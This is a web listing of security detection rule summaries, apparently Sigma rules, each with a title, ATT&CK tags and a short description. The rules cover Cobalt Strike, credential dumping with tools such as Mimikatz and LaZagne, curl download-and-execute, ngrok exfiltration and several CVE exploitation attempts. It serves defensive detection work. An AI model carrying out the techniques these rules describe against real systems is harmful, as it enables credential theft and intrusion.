    Share on: twitter facebook linkedin copy

    Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles


    Read More
  • CobaltStrike Service Installations - Security

    calendar Aug 12, 2024 · attack.execution attack.privilege-escalation attack.lateral-movement attack.t1021.002 attack.t1543.003 attack.t1569.002  ·
    Share on: twitter facebook linkedin copy

    Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement


    Read More
  • CobaltStrike Service Installations - System

    calendar Aug 12, 2024 · attack.execution attack.privilege-escalation attack.lateral-movement attack.t1021.002 attack.t1543.003 attack.t1569.002  ·
    Share on: twitter facebook linkedin copy

    Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement


    Read More
  • Code Executed Via Office Add-in XLL File

    calendar Aug 12, 2024 · attack.persistence attack.t1137.006  ·
    Share on: twitter facebook linkedin copy

    Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs


    Read More
  • Code Execution via Pcwutl.dll

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218.011  ·
    Share on: twitter facebook linkedin copy

    Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.


    Read More
  • Code Injection by ld.so Preload

    calendar Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.t1574.006  ·
    Share on: twitter facebook linkedin copy

    Detects the ld.so preload persistence file. See man ld.so for more information.


    Read More
  • CodeIntegrity - Blocked Driver Load With Revoked Certificate

    calendar Aug 12, 2024 · attack.privilege-escalation attack.t1543  ·
    Share on: twitter facebook linkedin copy

    Detects blocked load attempts of revoked drivers


    Read More
  • CodeIntegrity - Blocked Image Load With Revoked Certificate

    calendar Aug 12, 2024 · attack.privilege-escalation  ·
    Share on: twitter facebook linkedin copy

    Detects blocked image load events with revoked certificates by code integrity.


    Read More
  • CodeIntegrity - Blocked Image/Driver Load For Policy Violation

    calendar Aug 12, 2024 · attack.privilege-escalation attack.t1543  ·
    Share on: twitter facebook linkedin copy

    Detects blocked load events that did not meet the authenticode signing level requirements or violated the code integrity policy.


    Read More
  • CodeIntegrity - Disallowed File For Protected Processes Has Been Blocked

    calendar Aug 12, 2024 · attack.privilege-escalation  ·
    Share on: twitter facebook linkedin copy

    Detects block events for files that are disallowed by code integrity for protected processes


    Read More
  • CodeIntegrity - Revoked Image Loaded

    calendar Aug 12, 2024 · attack.privilege-escalation  ·
    Share on: twitter facebook linkedin copy

    Detects image load events with revoked certificates by code integrity.


    Read More
  • CodeIntegrity - Revoked Kernel Driver Loaded

    calendar Aug 12, 2024 · attack.privilege-escalation  ·
    Share on: twitter facebook linkedin copy

    Detects the load of a revoked kernel driver


    Read More
  • CodeIntegrity - Unmet WHQL Requirements For Loaded Kernel Module

    calendar Aug 12, 2024 · attack.privilege-escalation  ·
    Share on: twitter facebook linkedin copy

    Detects loaded kernel modules that did not meet the WHQL signing requirements.


    Read More
  • CodeIntegrity - Unsigned Image Loaded

    calendar Aug 12, 2024 · attack.privilege-escalation  ·
    Share on: twitter facebook linkedin copy

    Detects loaded unsigned image on the system


    Read More
  • CodeIntegrity - Unsigned Kernel Module Loaded

    calendar Aug 12, 2024 · attack.privilege-escalation  ·
    Share on: twitter facebook linkedin copy

    Detects the presence of a loaded unsigned kernel module on the system.


    Read More
  • COLDSTEEL Persistence Service Creation

    calendar Aug 12, 2024 · attack.defense-evasion attack.persistence detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of new services potentially related to COLDSTEEL RAT


    Read More
  • COLDSTEEL RAT Anonymous User Process Execution

    calendar Aug 12, 2024 · attack.persistence attack.defense-evasion detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of a process executing as user called "ANONYMOUS" seen used by the "MileStone2016" variant of COLDSTEEL


    Read More
  • COLDSTEEL RAT Cleanup Command Execution

    calendar Aug 12, 2024 · attack.persistence attack.defense-evasion detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of a "rundll32" process from the ColdSteel persistence service to initiate the cleanup command by calling one of its own exports. This functionality is not present in "MileStone2017" and some "MileStone2016" samples


    Read More
  • COLDSTEEL RAT Service Persistence Execution

    calendar Aug 12, 2024 · attack.persistence attack.defense-evasion detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of an "svchost" process with specific command line flags, that were seen present and used by ColdSteel RAT


    Read More
  • COM Hijack via Sdclt

    calendar Aug 12, 2024 · attack.privilege-escalation attack.t1546 attack.t1548  ·
    Share on: twitter facebook linkedin copy

    Detects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute'


    Read More
  • COM Hijacking via TreatAs

    calendar Aug 12, 2024 · attack.persistence attack.t1546.015  ·
    Share on: twitter facebook linkedin copy

    Detect modification of TreatAs key to enable "rundll32.exe -sta" command


    Read More
  • Command Line Execution with Suspicious URL and AppData Strings

    calendar Aug 12, 2024 · attack.execution attack.command-and-control attack.t1059.003 attack.t1059.001 attack.t1105  ·
    Share on: twitter facebook linkedin copy

    Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)


    Read More
  • Commands to Clear or Remove the Syslog

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1070.002  ·
    Share on: twitter facebook linkedin copy

    Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks


    Read More
  • Commands to Clear or Remove the Syslog - Builtin

    calendar Aug 12, 2024 · attack.impact attack.t1565.001  ·
    Share on: twitter facebook linkedin copy

    Detects specific commands commonly used to remove or empty the syslog


    Read More
  • Common Autorun Keys Modification

    calendar Aug 12, 2024 · attack.persistence attack.t1547.001  ·
    Share on: twitter facebook linkedin copy

    Detects modification of autostart extensibility point (ASEP) in registry.


    Read More
  • Communication To LocaltoNet Tunneling Service Initiated

    calendar Aug 12, 2024 · attack.command-and-control attack.t1572 attack.t1090 attack.t1102  ·
    Share on: twitter facebook linkedin copy

    Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.


    Read More
  • Communication To LocaltoNet Tunneling Service Initiated - Linux

    calendar Aug 12, 2024 · attack.command-and-control attack.t1572 attack.t1090 attack.t1102  ·
    Share on: twitter facebook linkedin copy

    Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.


    Read More
  • Communication To Ngrok Tunneling Service - Linux

    calendar Aug 12, 2024 · attack.exfiltration attack.command-and-control attack.t1567 attack.t1568.002 attack.t1572 attack.t1090 attack.t1102 attack.s0508  ·
    Share on: twitter facebook linkedin copy

    Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors


    Read More
  • Communication To Ngrok Tunneling Service Initiated

    calendar Aug 12, 2024 · attack.exfiltration attack.command-and-control attack.t1567 attack.t1568.002 attack.t1572 attack.t1090 attack.t1102 attack.s0508  ·
    Share on: twitter facebook linkedin copy

    Detects an executable initiating a network connection to "ngrok" tunneling domains. Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.


    Read More
  • Communication To Uncommon Destination Ports

    calendar Aug 12, 2024 · attack.persistence attack.command-and-control attack.t1571  ·
    Share on: twitter facebook linkedin copy

    Detects programs that connect to uncommon destination ports


    Read More
  • Compress Data and Lock With Password for Exfiltration With 7-ZIP

    calendar Aug 12, 2024 · attack.collection attack.t1560.001  ·
    Share on: twitter facebook linkedin copy

    An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities


    Read More
  • Compress Data and Lock With Password for Exfiltration With WINZIP

    calendar Aug 12, 2024 · attack.collection attack.t1560.001  ·
    Share on: twitter facebook linkedin copy

    An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities


    Read More
  • Computer Discovery And Export Via Get-ADComputer Cmdlet

    calendar Aug 12, 2024 · attack.discovery attack.t1033  ·
    Share on: twitter facebook linkedin copy

    Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file


    Read More
  • Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell

    calendar Aug 12, 2024 · attack.discovery attack.t1033  ·
    Share on: twitter facebook linkedin copy

    Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file


    Read More
  • Computer Password Change Via Ksetup.EXE

    calendar Aug 12, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects password change for the computer's domain account or host principal via "ksetup.exe"


    Read More
  • Computer System Reconnaissance Via Wmic.EXE

    calendar Aug 12, 2024 · attack.discovery attack.execution attack.t1047  ·
    Share on: twitter facebook linkedin copy

    Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc.


    Read More
  • ComRAT Network Communication

    calendar Aug 12, 2024 · attack.defense-evasion attack.command-and-control attack.t1071.001 attack.g0010  ·
    Share on: twitter facebook linkedin copy

    Detects Turla ComRAT network communication.


    Read More
  • Confluence Exploitation CVE-2019-3398

    calendar Aug 12, 2024 · attack.initial-access attack.t1190 cve.2019-3398 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the exploitation of the Confluence vulnerability described in CVE-2019-3398


    Read More
  • Conhost.exe CommandLine Path Traversal

    calendar Aug 12, 2024 · attack.execution attack.t1059.003  ·
    Share on: twitter facebook linkedin copy

    detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking


    Read More
  • Connection Proxy

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1090  ·
    Share on: twitter facebook linkedin copy

    Detects setting proxy configuration


    Read More
  • Container Residence Discovery Via Proc Virtual FS

    calendar Aug 12, 2024 · attack.discovery attack.t1082  ·
    Share on: twitter facebook linkedin copy

    Detects potential container discovery via listing of certain kernel features in the "/proc" virtual filesystem


    Read More
  • Conti NTDS Exfiltration Command

    calendar Aug 12, 2024 · attack.collection attack.t1560 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects a command used by conti to exfiltrate NTDS


    Read More
  • Conti Volume Shadow Listing

    calendar Aug 12, 2024 · attack.t1587.001 attack.resource-development detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects a command used by conti to find volume shadow backups


    Read More
  • Control Panel Items

    calendar Aug 12, 2024 · attack.execution attack.defense-evasion attack.t1218.002 attack.persistence attack.t1546  ·
    Share on: twitter facebook linkedin copy

    Detects the malicious use of a control panel item


    Read More
  • ConvertTo-SecureString Cmdlet Usage Via CommandLine

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1027 attack.execution attack.t1059.001  ·
    Share on: twitter facebook linkedin copy

    Detects usage of the "ConvertTo-SecureString" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity


    Read More
  • Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE

    calendar Aug 12, 2024 · attack.credential-access  ·
    Share on: twitter facebook linkedin copy

    Detects usage of the copy builtin cmd command to copy files with the ".dmp"/".dump" extension from a remote share


    Read More
  • Copy From Or To Admin Share Or Sysvol Folder

    calendar Aug 12, 2024 · attack.lateral-movement attack.collection attack.exfiltration attack.t1039 attack.t1048 attack.t1021.002  ·
    Share on: twitter facebook linkedin copy

    Detects a copy command or a copy utility execution to or from an Admin share or remote


    Read More
  • Copy From VolumeShadowCopy Via Cmd.EXE

    calendar Aug 12, 2024 · attack.impact attack.t1490  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of the builtin "copy" command that targets a shadow copy (sometimes used to copy registry hives that are in use)


    Read More
  • Copy Passwd Or Shadow From TMP Path

    calendar Aug 12, 2024 · attack.credential-access attack.t1552.001  ·
    Share on: twitter facebook linkedin copy

    Detects when the file "passwd" or "shadow" is copied from tmp path


    Read More
  • Copying Sensitive Files with Credential Data

    calendar Aug 12, 2024 · attack.credential-access attack.t1003.002 attack.t1003.003 car.2013-07-001 attack.s0404  ·
    Share on: twitter facebook linkedin copy

    Files with well-known filenames (sensitive files with credential data) copying


    Read More
  • CosmicDuke Service Installation

    calendar Aug 12, 2024 · attack.persistence attack.t1543.003 attack.t1569.002 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the installation of a service named "javamtsup" on the system. The CosmicDuke info stealer uses Windows services typically named "javamtsup" for persistence.


    Read More
  • CrashControl CrashDump Disabled

    calendar Aug 12, 2024 · attack.t1564 attack.t1112  ·
    Share on: twitter facebook linkedin copy

    Detects disabling the CrashDump per registry (as used by HermeticWiper)


    Read More
  • Create Volume Shadow Copy with Powershell

    calendar Aug 12, 2024 · attack.credential-access attack.t1003.003  ·
    Share on: twitter facebook linkedin copy

    Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information


    Read More
  • Created Files by Microsoft Sync Center

    calendar Aug 12, 2024 · attack.t1055 attack.t1218 attack.execution attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    This rule detects suspicious files created by Microsoft Sync Center (mobsync)


    Read More
  • Creation Exe for Service with Unquoted Path

    calendar Aug 12, 2024 · attack.persistence attack.t1547.009  ·
    Share on: twitter facebook linkedin copy

    Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.


    Read More
  • Creation of a Diagcab

    calendar Aug 12, 2024 · attack.resource-development  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of diagcab file, which could be caused by some legitimate installer or is a sign of exploitation (review the filename and its location)


    Read More
  • Creation of a Local Hidden User Account by Registry

    calendar Aug 12, 2024 · attack.persistence attack.t1136.001  ·
    Share on: twitter facebook linkedin copy

    Sysmon registry detection of a local hidden user account.


    Read More
  • Creation Of A Local User Account

    calendar Aug 12, 2024 · attack.t1136.001 attack.persistence  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.


    Read More
  • Creation Of a Suspicious ADS File Outside a Browser Download

    calendar Aug 12, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers


    Read More
  • Creation Of An User Account

    calendar Aug 12, 2024 · attack.t1136.001 attack.persistence  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.


    Read More
  • Cred Dump Tools Dropped Files

    calendar Aug 12, 2024 · attack.credential-access attack.t1003.001 attack.t1003.002 attack.t1003.003 attack.t1003.004 attack.t1003.005  ·
    Share on: twitter facebook linkedin copy

    Files with well-known filenames (parts of credential dump software or files produced by them) creation


    Read More
  • Credential Dumping Activity By Python Based Tool

    calendar Aug 12, 2024 · attack.credential-access attack.t1003.001 attack.s0349  ·
    Share on: twitter facebook linkedin copy

    Detects LSASS process access for potential credential dumping by a Python-like tool such as LaZagne or Pypykatz.


    Read More
  • Credential Dumping Attempt Via Svchost

    calendar Aug 12, 2024 · attack.t1548  ·
    Share on: twitter facebook linkedin copy

    Detects when a process tries to access the memory of svchost to potentially dump credentials.


    Read More
  • Credential Dumping Attempt Via WerFault

    calendar Aug 12, 2024 · attack.credential-access attack.t1003.001 attack.s0002  ·
    Share on: twitter facebook linkedin copy

    Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.


    Read More
  • Credential Dumping Tools Service Execution - Security

    calendar Aug 12, 2024 · attack.credential-access attack.execution attack.t1003.001 attack.t1003.002 attack.t1003.004 attack.t1003.005 attack.t1003.006 attack.t1569.002 attack.s0005  ·
    Share on: twitter facebook linkedin copy

    Detects well-known credential dumping tools execution via service execution events


    Read More
  • Credential Dumping Tools Service Execution - System

    calendar Aug 12, 2024 · attack.credential-access attack.execution attack.t1003.001 attack.t1003.002 attack.t1003.004 attack.t1003.005 attack.t1003.006 attack.t1569.002 attack.s0005  ·
    Share on: twitter facebook linkedin copy

    Detects well-known credential dumping tools execution via service execution events


    Read More
  • Credential Manager Access By Uncommon Applications

    calendar Aug 12, 2024 · attack.t1003 attack.credential-access  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious processes based on name and location that access the windows credential manager and vault. Which can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::cred" function


    Read More
  • Credentials from Password Stores - Keychain

    calendar Aug 12, 2024 · attack.credential-access attack.t1555.001  ·
    Share on: twitter facebook linkedin copy

    Detects passwords dumps from Keychain


    Read More
  • Credentials In Files

    calendar Aug 12, 2024 · attack.credential-access attack.t1552.001  ·
    Share on: twitter facebook linkedin copy

    Detecting attempts to extract passwords with grep and laZagne


    Read More
  • Credentials In Files - Linux

    calendar Aug 12, 2024 · attack.credential-access attack.t1552.001  ·
    Share on: twitter facebook linkedin copy

    Detecting attempts to extract passwords with grep


    Read More
  • CredUI.DLL Loaded By Uncommon Process

    calendar Aug 12, 2024 · attack.credential-access attack.collection attack.t1056.002  ·
    Share on: twitter facebook linkedin copy

    Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW".


    Read More
  • Critical Hive In Suspicious Location Access Bits Cleared

    calendar Aug 12, 2024 · attack.credential-access attack.t1003.002  ·
    Share on: twitter facebook linkedin copy

    Detects events from the Kernel-General ETW indicating that the access bits of a hive with a system like hive name located in the temp directory have been reset. This occurs when an application tries to access a hive and the hive has not be recognized since the last 7 days (by default). Registry hive dumping utilities such as QuarksPwDump were seen emitting this behavior.


    Read More
  • Crontab Enumeration

    calendar Aug 12, 2024 · attack.discovery attack.t1007  ·
    Share on: twitter facebook linkedin copy

    Detects usage of crontab to list the tasks of the user


    Read More
  • Cross Site Scripting Strings

    calendar Aug 12, 2024 · attack.initial-access attack.t1189  ·
    Share on: twitter facebook linkedin copy

    Detects XSS attempts injected via GET requests in access logs


    Read More
  • Crypto Miner User Agent

    calendar Aug 12, 2024 · attack.command-and-control attack.t1071.001  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious user agent strings used by crypto miners in proxy logs


    Read More
  • Csc.EXE Execution Form Potentially Suspicious Parent

    calendar Aug 12, 2024 · attack.execution attack.t1059.005 attack.t1059.007 attack.defense-evasion attack.t1218.005 attack.t1027.004  ·
    Share on: twitter facebook linkedin copy

    Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery.


    Read More
  • Cscript/Wscript Uncommon Script Extension Execution

    calendar Aug 12, 2024 · attack.execution attack.t1059.005 attack.t1059.007  ·
    Share on: twitter facebook linkedin copy

    Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension


    Read More
  • CSExec Service File Creation

    calendar Aug 12, 2024 · attack.execution attack.t1569.002 attack.s0029  ·
    Share on: twitter facebook linkedin copy

    Detects default CSExec service filename which indicates CSExec service installation and execution


    Read More
  • CSExec Service Installation

    calendar Aug 12, 2024 · attack.execution attack.t1569.002  ·
    Share on: twitter facebook linkedin copy

    Detects CSExec service installation and execution events


    Read More
  • Curl Download And Execute Combination

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218 attack.command-and-control attack.t1105  ·
    Share on: twitter facebook linkedin copy

    Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.


    Read More
  • Curl Usage on Linux

    calendar Aug 12, 2024 · attack.command-and-control attack.t1105  ·
    Share on: twitter facebook linkedin copy

    Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server


    Read More
  • Curl Web Request With Potential Custom User-Agent

    calendar Aug 12, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects execution of "curl.exe" with a potential custom "User-Agent". Attackers can leverage this to download or exfiltrate data via "curl" to a domain that only accept specific "User-Agent" strings


    Read More
  • CurrentControlSet Autorun Keys Modification

    calendar Aug 12, 2024 · attack.persistence attack.t1547.001  ·
    Share on: twitter facebook linkedin copy

    Detects modification of autostart extensibility point (ASEP) in registry.


    Read More
  • CurrentVersion Autorun Keys Modification

    calendar Aug 12, 2024 · attack.persistence attack.t1547.001  ·
    Share on: twitter facebook linkedin copy

    Detects modification of autostart extensibility point (ASEP) in registry.


    Read More
  • CurrentVersion NT Autorun Keys Modification

    calendar Aug 12, 2024 · attack.persistence attack.t1547.001  ·
    Share on: twitter facebook linkedin copy

    Detects modification of autostart extensibility point (ASEP) in registry.


    Read More
  • Custom File Open Handler Executes PowerShell

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1202  ·
    Share on: twitter facebook linkedin copy

    Detects the abuse of custom file open handler, executing powershell


    Read More
  • CVE-2010-5278 Exploitation Attempt

    calendar Aug 12, 2024 · attack.initial-access attack.t1190 cve.2010-5278 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    MODx manager - Local File Inclusion:Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter.


    Read More
  • CVE-2020-0688 Exchange Exploitation via Web Log

    calendar Aug 12, 2024 · attack.initial-access attack.t1190 cve.2020-0688 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688


    Read More
  • CVE-2020-0688 Exploitation Attempt

    calendar Aug 12, 2024 · attack.initial-access attack.t1190 cve.2020-0688 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects CVE-2020-0688 Exploitation attempts


    Read More
  • CVE-2020-0688 Exploitation via Eventlog

    calendar Aug 12, 2024 · attack.initial-access attack.t1190 cve.2020-0688 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688


    Read More
  • CVE-2020-10148 SolarWinds Orion API Auth Bypass

    calendar Aug 12, 2024 · attack.initial-access attack.t1190 cve.2020-10148 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects CVE-2020-10148 SolarWinds Orion API authentication bypass attempts


    Read More
  • CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - Registry

    calendar Aug 12, 2024 · attack.persistence attack.execution attack.defense-evasion attack.t1112 cve.2020-1048  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the "Ports" registry key with data that includes a Windows path or a file with a suspicious extension. This could be an attempt to exploit CVE-2020-1048 - a Windows Print Spooler elevation of privilege vulnerability.


    Read More
  • CVE-2020-5902 F5 BIG-IP Exploitation Attempt

    calendar Aug 12, 2024 · attack.initial-access attack.t1190 cve.2020-5902 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the exploitation attempt of the vulnerability found in F5 BIG-IP and described in CVE-2020-5902


    Read More
  • CVE-2021-1675 Print Spooler Exploitation

    calendar Aug 12, 2024 · attack.execution attack.t1569 cve.2021-1675 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675


    Read More
  • CVE-2021-1675 Print Spooler Exploitation IPC Access

    calendar Aug 12, 2024 · attack.execution attack.t1569 cve.2021-1675 cve.2021-34527 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527


    Read More
  • CVE-2021-21972 VSphere Exploitation

    calendar Aug 12, 2024 · attack.initial-access attack.t1190 cve.2021-21972 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the exploitation of VSphere Remote Code Execution vulnerability as described in CVE-2021-21972


    Read More
  • CVE-2021-21978 Exploitation Attempt

    calendar Aug 12, 2024 · attack.initial-access attack.t1190 cve.2021-21978 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the exploitation of the VMware View Planner vulnerability described in CVE-2021-21978


    Read More
  • CVE-2021-26858 Exchange Exploitation

    calendar Aug 12, 2024 · attack.t1203 attack.execution cve.2021-26858 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for creation of non-standard files on disk by Exchange Server’s Unified Messaging service which could indicate dropping web shells or other malicious content


    Read More
  • CVE-2021-31979 CVE-2021-33771 Exploits

    calendar Aug 12, 2024 · attack.credential-access attack.t1566 attack.t1203 cve.2021-33771 cve.2021-31979 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum


    Read More
  • CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum

    calendar Aug 12, 2024 · attack.credential-access attack.t1566 attack.t1203 cve.2021-33771 cve.2021-31979 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum


    Read More
  • CVE-2021-33766 Exchange ProxyToken Exploitation

    calendar Aug 12, 2024 · attack.initial-access attack.t1190 cve.2021-33766 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766


    Read More
  • CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit

    calendar Aug 12, 2024 · attack.initial-access attack.t1190 attack.persistence attack.t1505.003 cve.2021-40539 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539).


    Read More
  • CVE-2021-41773 Exploitation Attempt

    calendar Aug 12, 2024 · attack.initial-access attack.t1190 cve.2021-41773 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects exploitation of flaw in path normalization in Apache HTTP server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions.


    Read More
  • CVE-2021-44077 POC Default Dropped File

    calendar Aug 12, 2024 · attack.execution cve.2021-44077 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of "msiexec.exe" in the "bin" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)


    Read More
  • CVE-2022-24527 Microsoft Connected Cache LPE

    calendar Aug 12, 2024 · attack.privilege-escalation attack.t1059.001 cve.2022-24527 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache


    Read More
  • CVE-2022-31656 VMware Workspace ONE Access Auth Bypass

    calendar Aug 12, 2024 · attack.initial-access attack.t1190 cve.2022-31656 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the exploitation of VMware Workspace ONE Access Authentication Bypass vulnerability as described in CVE-2022-31656 VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.


    Read More
  • CVE-2022-31659 VMware Workspace ONE Access RCE

    calendar Aug 12, 2024 · attack.initial-access attack.t1190 cve.2022-31659 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects possible exploitation of VMware Workspace ONE Access Admin Remote Code Execution vulnerability as described in CVE-2022-31659


    Read More
  • CVE-2023-23397 Exploitation Attempt

    calendar Aug 12, 2024 · attack.credential-access attack.initial-access cve.2023-23397 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.


    Read More
  • CVE-2023-38331 Exploitation Attempt - Suspicious Double Extension File

    calendar Aug 12, 2024 · attack.execution cve.2023-38331 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of a file with a double extension and a space by WinRAR. This could be a sign of exploitation of CVE-2023-38331


    Read More
  • CVE-2023-40477 Potential Exploitation - .REV File Creation

    calendar Aug 12, 2024 · attack.execution cve.2023-40477 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of ".rev" files by WinRAR. Could be indicative of potential exploitation of CVE-2023-40477. Look for a suspicious execution shortly after creation or a WinRAR application crash.


    Read More
  • CVE-2023-40477 Potential Exploitation - WinRAR Application Crash

    calendar Aug 12, 2024 · attack.execution cve.2023-40477 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects a crash of "WinRAR.exe" where the version is lower than 6.23. This could indicate potential exploitation of CVE-2023-40477


    Read More
  • DarkSide Ransomware Pattern

    calendar Aug 12, 2024 · attack.execution attack.t1204 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects DarkSide Ransomware and helpers


    Read More
  • Data Compressed

    calendar Aug 12, 2024 · attack.exfiltration attack.t1560.001  ·
    Share on: twitter facebook linkedin copy

    An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.


    Read More
  • Data Copied To Clipboard Via Clip.EXE

    calendar Aug 12, 2024 · attack.collection attack.t1115  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications.


    Read More
  • Data Exfiltration to Unsanctioned Apps

